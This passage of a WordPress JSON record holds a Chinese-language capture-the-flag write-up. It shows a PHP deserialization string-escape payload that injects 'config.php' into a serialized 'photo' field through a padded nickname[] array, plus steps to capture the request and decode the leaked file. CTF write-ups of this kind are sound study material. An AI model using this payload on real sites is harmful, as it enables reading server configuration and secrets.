class=\"wp-block-paragraph\">\u5e8f\u5217\u5316\u540e\u5f97\u5230<code>-\u7701\u7565-21@qq.com\";s:8:\"nickname\";a:1:{i:0;s:204:\"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";}s:5:\"photo\";s:10:\"config.php\";}\";}s:5:\"photo\";s:39:\"upload\/75639-\u7701\u7565-<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6293\u5305\uff0c\u6539nickname[]\uff0c\u4f20payload\uff0c\u53d1\u5305<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-8-1024x725.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"725\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-8-1024x725.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-217\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u89c1\u5230hi\uff0carray\u5c31\u57fa\u672c\u6210\u529f\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-9.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"882\" height=\"489\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-218\"  sizes=\"auto, (max-width: 882px) 100vw, 882px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u770b\u6e90\u7801\u7684\u7167\u7247\uff0c\u89e3base64\u5f97\u5230flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-10-1024x261.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"261\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-10-1024x261.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-219\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-11-1024x353.png'><img class=\"lazyload lazyload-style-5\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"353\" data-original=\"https:\/\/asum1.fun\/wp-content\/uploads\/2026\/06\/image-11-1024x353.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-220\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u770b\u5230\u4e00\u4e2a\u767b\u5f55\u6846\uff0c\u8bd5\u4e00\u4e0bsql\u6ce8\u5165\uff0c\u5c1d\u8bd5\u65e0\u679c\u5f00\u59cb\u626b\u76ee\u5f55 \u770b\u4e00\u773crobots.txt\uff0c \u6ca1\u4e1c\u897f\uff0c\u63a5\u7740\u8bd5\u4e86\u4e0bwww. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":238,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-205","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn"],"_links":{"self":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts\/205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/comments?post=205"}],"version-history":[{"count":5,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts\/205\/revisions"}],"predecessor-version":[{"id":241,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/posts\/205\/revisions\/241"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/media\/238"}],"wp:attachment":[{"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/media?parent=205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/categories?post=205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/asum1.fun\/index.php\/wp-json\/wp\/v2\/tags?post=205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}